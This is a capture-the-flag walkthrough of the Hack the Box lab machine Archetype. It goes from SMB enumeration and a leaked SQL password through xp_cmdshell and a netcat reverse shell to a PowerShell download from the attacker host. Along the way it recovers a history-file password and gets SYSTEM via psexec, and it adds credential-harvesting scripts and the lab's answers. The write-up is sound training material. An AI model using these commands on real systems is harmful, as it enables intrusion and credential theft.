#12 ARCHETYPE - Starting Point - Hack the Box || Complete Walkthrough

Welcome to TIER II

Well done for reaching this point. From here on the boxes become a bit more demanding in the number of steps, the tooling and the exploitation attempts, and they start to resemble the machines on the main HTB platform. Archetype is a Windows machine on which you exploit a misconfiguration in Microsoft SQL Server, obtain a reverse shell, and get familiar with the Impacket toolkit for attacking Windows services.


Enumeration

A port scan to discover what is listening on the target is an essential first step of enumeration: it shows us the attack surface and lets us design targeted attacks. As usual we use Nmap, with -sC (default NSE scripts) and -sV (service and version detection).

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.33.197
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 11:23 IST
Nmap scan report for 10.129.33.197
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
|_ssl-date: 2021-12-27T06:05:12+00:00; +10m43s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-12-27T06:00:49
|_Not valid after:  2051-12-27T06:00:49
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-27T06:05:00
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-12-26T22:04:56-08:00
| ms-sql-info:
|   10.129.33.197:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017 
|       Service pack level: RTM 
|       Post-SP patches applied: false 
|_    TCP port: 1433 
|_clock-skew: mean: 1h46m43s, deviation: 3h34m40s, median: 10m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 63.76 seconds 

┌──(mrdev㉿mrdev)-[~]  
└─$

The scan shows SMB open (139/445) and Microsoft SQL Server 2017 on TCP port 1433. Two details are worth noting for later: the NTLM information from the SQL Server service confirms a standalone host named ARCHETYPE in WORKGROUP (no domain), and SMB message signing is enabled but not required.


Enumerate SMB shares with smbclient

We start with SMB, using smbclient to list the shares that an anonymous (null) session is allowed to see.

  • -N : No password (null session)
  • -L : List the shares (services) available on the server

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N -L \\\\10.129.33.197\\ 

Sharename       Type      Comment 
---------       ----      -------
ADMIN$          Disk      Remote Admin
backups         Disk  
C$              Disk      Default share
IPC$            IPC       Remote IPC  

SMB1 disabled -- no workgroup available

We found a couple of interesting shares. ADMIN$ and C$ are the default administrative shares, which a null session cannot open (smbclient reports NT_STATUS_ACCESS_DENIED), but backups is a custom share, so we try to open it and list its contents with the following command:

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N \\\\10.129.33.197\\backups
Try "help" to get a list of possible commands.
smb: \>  dir
.                                   D        0  Mon Jan 20 17:50:57 2020
..                                  D        0  Mon Jan 20 17:50:57 2020
prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020 
5056511 blocks of size 4096. 2611130 blocks available
smb: \> 

There is a single file, prod.dtsConfig. The .dtsConfig extension belongs to an SSIS (SQL Server Integration Services) package configuration file, which typically holds connection strings. We download it to our machine with the get command for offline inspection.

smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
┌──(mrdev㉿mrdev)-[~]
└─$ ls
prod.dtsConfig

Open the file to inspect the content:

┌──(mrdev㉿mrdev)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.; Password=M3g4c0rp123 ; User ID=ARCHETYPE\sql_svc ;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>

The ConfiguredValue is an OLE DB connection string (Provider=SQLNCLI10.1 is the SQL Server Native Client) that embeds, in clear text, the password M3g4c0rp123 for the Windows account ARCHETYPE\sql_svc against Data Source=. (the local SQL Server instance). Persist Security Info=True additionally tells the client to keep the password in the connection object after it is opened. With these credentials we only need a way to connect and authenticate to the MS-SQL server.
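Config files like this are a recurring source of credentials, so it pays to parse them mechanically rather than eyeball them. The following is an added example (not code from the original walkthrough): it parses a .dtsConfig document with the standard library, splits each connection string into key/value pairs, and reports every one that carries a password. The embedded sample mirrors the file found on the share; the GeneratedBy and package attributes are elided on the page and are placeholders here. It also generalises slightly beyond the page by accepting the pwd / uid / server spellings that OLE DB, ODBC and SqlClient connection strings allow.

```python
import xml.etree.ElementTree as ET

# Constructed sample that mirrors the prod.dtsConfig recovered from the backups share.
# The password and account are the ones shown on the page; the GeneratedBy / package
# attributes are elided there and are placeholders here.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..."
        GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property"
      Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.; Password=M3g4c0rp123 ; User ID=ARCHETYPE\sql_svc ;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

# Connection-string keys that carry a secret, an identity or a target. OLE DB, ODBC and
# SqlClient accept these spellings; keys are case-insensitive.
SECRET_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid")
SERVER_KEYS = ("data source", "server", "address", "addr")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased, whitespace-stripped keys."""
    pairs = {}
    for segment in value.split(";"):
        if "=" not in segment:
            continue  # empty segment from the trailing ';'
        key, _, val = segment.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def first_present(pairs, keys):
    return next((pairs[k] for k in keys if k in pairs), None)


def find_credentials(xml_text):
    """Return one record per <ConfiguredValue> whose connection string embeds a password."""
    root = ET.fromstring(xml_text)
    hits = []
    for conf in root.iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        pairs = parse_connection_string(node.text)
        password = first_present(pairs, SECRET_KEYS)
        if password is None:
            continue  # e.g. Integrated Security=SSPI: nothing to harvest
        hits.append({
            "path": conf.get("Path"),
            "server": first_present(pairs, SERVER_KEYS),
            "user": first_present(pairs, USER_KEYS),
            "password": password,
            # True means the client keeps the password inside the open connection object
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return hits


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_DTSCONFIG):
        print(f"{hit['path']}: {hit['user']} / {hit['password']} on {hit['server']!r}")
```

Run it against every *.dtsConfig, *.config or web.config you pull from a share; a Data Source of "." tells you the credential is for the SQL instance on the host that owns the file.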


Connect to Microsoft SQL Server using Impacket

Impacket includes a Python script called mssqlclient.py which offers exactly that functionality. But first, a short look at what Impacket is and how to install it.

Impacket is a collection of Python classes for working with network protocols (SMB, MSRPC, Kerberos, TDS for MSSQL and more) together with example scripts built on top of them. The project is hosted on GitHub at https://github.com/fortra/impacket (formerly SecureAuthCorp/impacket), where the README documents every script. Clone the repository and install it:

┌──(mrdev㉿mrdev)-[~]
└─$ git clone https://github.com/fortra/impacket.git
└─$ cd impacket
└─$ pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

mssqlclient.py lives in the examples directory (the install step also places the example scripts on your PATH, so they can be run from anywhere):

┌──(mrdev㉿mrdev)-[~]
└─$ cd impacket/examples/
┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ ls
addcomputer.py      getPac.py       mssqlinstance.py      registry-read.py  smbrelayx.py
atexec.py           getST.py        netview.py            reg.py            smbserver.py
dcomexec.py         getTGT.py       nmapAnswerMachine.py  rpcdump.py        sniffer.py
dpapi.py            GetUserSPNs.py  ntfs-read.py          rpcmap.py         sniff.py
esentutl.py         goldenPac.py    ntlmrelayx.py         sambaPipe.py      split.py
exchanger.py        karmaSMB.py     ping6.py              samrdump.py       ticketConverter.py
findDelegation.py   kintercept.py   ping.py               secretsdump.py    ticketer.py
GetADUsers.py       lookupsid.py    psexec.py             services.py       wmiexec.py 
getArch.py          mimikatz.py     raiseChild.py         smbclient.py      wmipersist.py
Get-GPPPassword.py  mqtt_check.py   rbcd.py               smbexec.py        wmiquery.py
GetNPUsers.py       mssqlclient.py   rdp_check.py          smbpasswd.py 
┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ 

After reviewing the options (./mssqlclient.py -h), we connect with -windows-auth, because the credentials belong to a Windows account rather than a SQL login. Root privileges are not needed for this:

┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ ./mssqlclient.py ARCHETYPE/sql_svc@10.129.33.197 -windows-auth
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
Password:

We provide the password we spotted previously in the configuration file:

Password:
[*] Encryption required, switching to TLS 
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

We successfully authenticated to the Microsoft SQL Server!


Foothold

After our successful connection, run help to list the commands of the SQL shell. Besides raw T-SQL it offers a handful of convenience wrappers:

SQL> help
lcd {path}                 - changes the current local directory to {path}
exit                       - terminates the server process (and this session)
enable_xp_cmdshell         - you know what it means
disable_xp_cmdshell        - you know what it means
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
! {cmd}                    - executes a local shell cmd
SQL> 


Gain Foothold from SQL Shell

First, enable xp_cmdshell. The enable_xp_cmdshell helper runs sp_configure to turn on 'show advanced options' and then 'xp_cmdshell' (each changes from 0 to 1) and issues RECONFIGURE for us; the "Run the RECONFIGURE statement to install" notices are the standard sp_configure messages, so running RECONFIGURE again by hand is harmless but not required. Changing these options needs the ALTER SETTINGS permission, which sysadmin holds implicitly, and executing xp_cmdshell needs sysadmin (or a configured proxy account). That a service account used by an SSIS package is a sysadmin is the misconfiguration this box is built around.

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL>
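The sequence the helper hides is worth seeing written out, because the order matters (an advanced option cannot be set until 'show advanced options' has been reconfigured) and because leaving xp_cmdshell enabled on a client's server is a bad habit. The following is an added example, not code from the original walkthrough or from Impacket: run_via_xp_cmdshell takes any `query(sql) -> rows` callable (for instance a thin wrapper around impacket.tds.MSSQL.sql_query, an assumption of this example), checks sysadmin membership, enables xp_cmdshell only if needed, confirms the change through sys.configurations.value_in_use, runs the command and restores the previous state. SimulatedServer is a constructed stand-in that models the configured-versus-running distinction of sp_configure, so the block runs offline.

```python
import re

# The T-SQL behind mssqlclient.py's enable_xp_cmdshell / disable_xp_cmdshell helpers:
# 'show advanced options' gates the visibility of xp_cmdshell, RECONFIGURE applies each change.
ENABLE_BATCH = (
    "EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
)
DISABLE_BATCH = (
    "EXEC master.dbo.sp_configure 'xp_cmdshell', 0; RECONFIGURE; "
    "EXEC master.dbo.sp_configure 'show advanced options', 0; RECONFIGURE;"
)


def run_via_xp_cmdshell(query, cmd, cleanup=True):
    """Run `cmd` through xp_cmdshell using `query(sql) -> rows`, then restore the server state.

    `query` is any callable that executes a T-SQL batch and returns rows as tuples
    (e.g. a wrapper around impacket.tds.MSSQL.sql_query; an assumption of this example).
    """
    # xp_cmdshell executes only for members of sysadmin (or through a configured proxy account).
    if query("SELECT IS_SRVROLEMEMBER('sysadmin')")[0][0] != 1:
        raise PermissionError("login is not sysadmin: xp_cmdshell is not available")

    def in_use(option):  # the running value, i.e. what the engine uses after RECONFIGURE
        return query(f"SELECT value_in_use FROM sys.configurations WHERE name = '{option}'")[0][0]

    was_enabled = in_use("xp_cmdshell") == 1
    if not was_enabled:
        query(ENABLE_BATCH)
        if in_use("xp_cmdshell") != 1:
            raise RuntimeError("xp_cmdshell still disabled after RECONFIGURE")
    literal = cmd.replace("'", "''")  # T-SQL string-literal escaping
    rows = query(f"EXEC master.dbo.xp_cmdshell '{literal}'")
    output = [r[0] for r in rows if r[0] is not None]  # the trailing NULL row is normal
    if cleanup and not was_enabled:
        query(DISABLE_BATCH)  # leave the server as we found it
    return output


SP_CONFIGURE = r"(?i)exec\s+(?:master\.dbo\.)?sp_configure\s+'([^']+)'\s*,\s*(\d)"
VALUE_IN_USE = r"(?i)select value_in_use from sys\.configurations where name = '([^']+)'"
XP_CMDSHELL = r"(?i)exec\s+(?:master\.dbo\.)?xp_cmdshell\s+'(.*)'$"


class SimulatedServer:
    """Constructed stand-in for SQL Server, just enough to exercise the sequence above:
    sp_configure writes the configured value, RECONFIGURE promotes it to the running value.
    (It splits batches on ';', so commands containing ';' are outside its scope.)"""

    def __init__(self, sysadmin=True):
        self.configured = {"show advanced options": 0, "xp_cmdshell": 0}
        self.running = dict(self.configured)
        self.sysadmin = sysadmin
        self.executed = []  # commands that reached xp_cmdshell

    def query(self, batch):
        result = []
        for stmt in filter(None, (s.strip() for s in batch.split(";"))):
            if (m := re.match(SP_CONFIGURE, stmt)):
                name, value = m.group(1).lower(), int(m.group(2))
                if name != "show advanced options" and not self.running["show advanced options"]:
                    raise RuntimeError(f"'{name}' is an advanced option")  # engine error 15123
                self.configured[name] = value
            elif stmt.upper() == "RECONFIGURE":
                self.running = dict(self.configured)
            elif stmt.upper() == "SELECT IS_SRVROLEMEMBER('SYSADMIN')":
                result = [(1 if self.sysadmin else 0,)]
            elif (m := re.match(VALUE_IN_USE, stmt)):
                result = [(self.running[m.group(1).lower()],)]
            elif (m := re.match(XP_CMDSHELL, stmt)):
                if not self.running["xp_cmdshell"]:
                    raise RuntimeError("xp_cmdshell is disabled")  # engine error 15281
                self.executed.append(m.group(1).replace("''", "'"))
                result = [("archetype\\sql_svc",), (None,)]  # what `whoami` returned on the box
            else:
                raise ValueError("unsupported statement: " + stmt)
        return result


if __name__ == "__main__":
    server = SimulatedServer()
    print(run_via_xp_cmdshell(server.query, "whoami"), server.running)
```

The same two SELECTs are useful defensively: a login that is not sysadmin should get 0 from IS_SRVROLEMEMBER, and value_in_use for xp_cmdshell should be 0 on any server that does not need it.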

The whoami output shows that xp_cmdshell runs commands as the SQL Server service account, ARCHETYPE\sql_svc, the same account whose credentials we found. It is a regular user rather than a local administrator, so we will need to escalate later.

SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
SQL> 

Now we attempt to get a stable reverse shell: upload the nc64.exe binary (the 64-bit Windows build of Netcat, available from GitHub) to the target and have it spawn an interactive cmd.exe connected back to our listener.

Copy the binary into the htdocs directory of the XAMPP web server, open the XAMPP control panel and start Apache; in this setup Apache listens on port 8080. Any HTTP server will do, for example python3 -m http.server 8080 run from the directory that holds the file.

To upload the binary we need a directory the service account can write to; its own Downloads folder is a safe choice. We use PowerShell rather than the command prompt because it has a built-in HTTP client. Since xp_cmdshell spawns cmd.exe, we have to invoke PowerShell explicitly on every call until we have the reverse shell, using powershell -c:

  • -c (short for -Command) tells PowerShell to execute the given command string and exit.

We will print the current working directory by using pwd command.

SQL> xp_cmdshell "powershell -c pwd"
output 
--------------------------------------------------------------------------------
NULL 
Path
----
C:\Windows\system32
NULL
NULL
NULL

SQL>

Run the command below to download nc64.exe into sql_svc's Downloads folder. Here wget is a PowerShell alias for Invoke-WebRequest, not GNU wget, and -outfile (-OutFile) names the destination file:

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.62:8080/nc64.exe -outfile nc64.exe "
output
--------------------------------------------------------------------------------
NULL
SQL>

Start a Netcat listener on the attacking machine first. In this walkthrough it runs on a Windows host with the netcat-1.11 build; nc -lvnp 443 on Linux behaves the same:

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.

C:\Users\mrdeveloper>cd ..
C:\Users>cd ..
C:\>cd netcat-1.11
C:\netcat-1.11> nc -lvnp 443
listening on [any] 443 ...

Then, from the SQL shell, run nc64.exe with -e cmd.exe pointed at our IP and port. The IP must be the attacking machine that served the file, 10.10.14.62 here:

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.62 443"

The xp_cmdshell call does not return while the shell is alive, which is expected. Looking back at our Netcat listener we can confirm the reverse shell and our foothold on the system.

C:\netcat-1.11>nc -lvnp 443
listening on [any] 443 ... 
connect to [10.10.14.62] from (UNKNOWN) [10.129.33.197] 49676
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>

The user flag can be found on the user's Desktop.

C:\Users\sql_svc\Downloads> cd ..
cd ..
C:\Users\sql_svc> cd Desktop
cd Desktop
C:\Users\sql_svc\Desktop> dir  
dir 
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop  
01/20/2020  05:42 AM    <DIR>          . 
01/20/2020  05:42 AM    <DIR>          ..
02/25/2020  06:37 AM                32 user.txt
1 File(s)             32 bytes    
2 Dir(s)  10,683,121,664 bytes free 
C:\Users\sql_svc\Desktop> type user.txt  
3***************************3 


Privilege Escalation


Escalate Privilege using WinPEAS

For privilege escalation, we are going to use a tool called winPEAS, which can automate a big part of the enumeration process in the target system.

Let me change the directory to Downloads.

C:\Users\sql_svc\Desktop> cd .. 
cd ..  
C:\Users\sql_svc> cd Downloads   
cd Downloads 

Download winPEASx64.exe from the PEASS-ng releases on GitHub (https://github.com/carlospolop/PEASS-ng) and serve it from the XAMPP web server, exactly as we did with nc64.exe.

PEASS-ng (Privilege Escalation Awesome Scripts SUITE new generation) is a collection of privilege escalation enumeration scripts and binaries for Windows (winPEAS) and Linux/Unix (linPEAS). They automate a large part of the local enumeration on a compromised machine and highlight likely escalation paths.


On the target, download the binary with PowerShell's wget alias; we now have an interactive shell, so the commands are typed directly:

C:\Users\sql_svc\Downloads> powershell wget http://10.10.14.62:8080/winPEASx64.exe -outfile winPEASx64.exe
powershell wget http://10.10.14.62:8080/winPEASx64.exe -outfile winPEASx64.exe

Once the download has completed, execute it:

C:\Users\sql_svc\Downloads> .\winPEASx64.exe

The output of the tool is long; the sections of interest here are the token privileges and the findings about history, log and backup files. winPEAS reports that sql_svc holds SeImpersonatePrivilege, the privilege abused by the Potato family of exploits (the original JuicyPotato no longer works on Windows Server 2019, where PrintSpoofer or RoguePotato would be used instead). Before going down that road it is worth checking the files winPEAS flags as possible credential stores.

Since sql_svc is both an interactive user account and a service account, frequently accessed files and previously executed commands deserve a look. PowerShell keeps a per-user command history, the equivalent of .bash_history on Linux, in ConsoleHost_history.txt under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine.

Now, navigate to the folder where the PowerShell history is stored.

C:\Users\sql_svc\Downloads> cd ..  
cd ..   
C:\Users\sql_svc> cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine 
cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine  
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>dir 
dir     
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
01/20/2020  05:04 AM    <DIR>          .  
01/20/2020  05:04 AM    <DIR>          ..  
03/17/2020  01:36 AM                79 ConsoleHost_history.txt  
1 File(s)             79 bytes 
2 Dir(s)  10,718,646,272 bytes free    
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

To read the file we use type followed by the file name:

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt   
type ConsoleHost_history.txt     
net.exe use T: \\Archetype\backups /user: administrator MEGACORP_4dm1n!!   
exit
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

The history holds a net use command that mapped the backups share with the Administrator credentials in clear text: the administrator password is MEGACORP_4dm1n!!.
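Shell history is one of the first places to look for credentials on any host, and `net use`, `cmdkey` and friends put the password on the command line. The following is an added example (not code from the original walkthrough): it scans a ConsoleHost_history.txt for such commands and extracts target, user and password. The sample history is constructed; its first line is the one found on the box, including the stray space after /user:, and the parser handles both that spelling and the normal one, the password on either side of the /user: switch, and the `*` placeholder that makes net.exe prompt instead of logging a password.

```python
import re

# Constructed ConsoleHost_history.txt. The first line is the one found on the box (note the
# stray space after /user:); the others are added variants of the same mistake.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user: administrator MEGACORP_4dm1n!!
net use \\fileserver\share S3cret!Pass /user:MEGACORP\svc_backup /persistent:no
net use Z: \\nas\data * /user:alice
cmdkey /add:db01 /user:sa /pass:Sup3rS3cret
Get-ChildItem C:\Users
exit"""

NET_USE = re.compile(
    r"(?i)^\s*net(?:\.exe)?\s+use\s+(?:(?P<drive>[a-z]:)\s+)?(?P<share>\\\\\S+)\s*(?P<rest>.*)$")
CMDKEY = re.compile(r"(?i)^\s*cmdkey\s+.*?/user:(?P<user>\S+).*?/pass:(?P<password>\S+)")


def parse_net_use(line):
    """Extract share, user and password from a `net use` line.

    net.exe takes the password as a bare positional argument on either side of /user:,
    and `*` means "prompt for it", so no password is recoverable in that case.
    """
    m = NET_USE.match(line)
    if not m:
        return None
    tokens = m.group("rest").split()
    user, consumed = None, set()
    for i, tok in enumerate(tokens):
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
            consumed.add(i)
            if not user and i + 1 < len(tokens):  # "/user: name": the name became the next token
                user = tokens[i + 1]
                consumed.add(i + 1)
            break
    if not user:
        return None  # no explicit user, so no credential on this line
    positional = [t for j, t in enumerate(tokens) if j not in consumed and not t.startswith("/")]
    password = positional[0] if positional else None
    if password == "*":
        password = None
    return {"kind": "net use", "target": m.group("share"), "user": user, "password": password}


def parse_cmdkey(line):
    """Extract the stored credential from a `cmdkey /add:... /user:... /pass:...` line."""
    m = CMDKEY.match(line)
    if not m:
        return None
    target = re.search(r"(?i)/(?:add|generic):(\S+)", line)
    return {"kind": "cmdkey", "target": target.group(1) if target else None,
            "user": m.group("user"), "password": m.group("password")}


def find_credentials(history_text):
    """Return every history line that carries a usable (non-prompted) password."""
    hits = []
    for line in history_text.splitlines():
        rec = parse_net_use(line) or parse_cmdkey(line)
        if rec and rec["password"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_HISTORY):
        print(f"[{hit['kind']}] {hit['target']}  {hit['user']} : {hit['password']}")
```

Point it at every PSReadLine history you can read (each user profile has its own), and remember the defensive counterpart: net use with `*` or cmdkey prompting for the password keeps it out of the history in the first place.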


Get ADMINISTRATOR Access using PSEXEC

With the local administrator password in hand we can use psexec.py, again from the Impacket suite, to get a shell. It works the way Sysinternals PsExec does: it uploads a randomly named service binary to the writable ADMIN$ share and starts it through the Service Control Manager, which is why the resulting shell runs as NT AUTHORITY\SYSTEM and lands in C:\Windows\system32. No local root privileges are required:

┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ python3 psexec.py administrator@10.129.33.197
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.33.197.....
[*] Found writable share ADMIN$
[*] Uploading file IXpjoSao.exe
[*] Opening SVCManager on 10.129.33.197.....  
[*] Creating service PpfF on 10.129.33.197.....
[*] Starting service PpfF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

The root flag can now be found on the Desktop of the Administrator user.

C:\Windows\system32> cd .. 
C:\Windows> cd ..   
C:\> cd Users/Administrator/Desktop 
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021  01:30 AM    <DIR>          .
07/27/2021  01:30 AM    <DIR>          ..
02/25/2020  06:36 AM                32 root.txt
1 File(s)             32 bytes 
2 Dir(s)  10,718,441,472 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3*****************************8

Finally, we have managed to get both flags.


Task Answer


TASK 1: Which TCP port is hosting a database server?

Ans. 1433

TASK 2: What is the name of the non-administrative share available over SMB?

Ans. backups

TASK 3: What is the password identified in the file on the SMB share?

Ans. M3g4c0rp123

TASK 4: What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

Ans. mssqlclient.py

TASK 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

Ans. xp_cmdshell

TASK 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

Ans. winpeas

TASK 7: What file contains the administrator's password?

Ans. ConsoleHost_history.txt
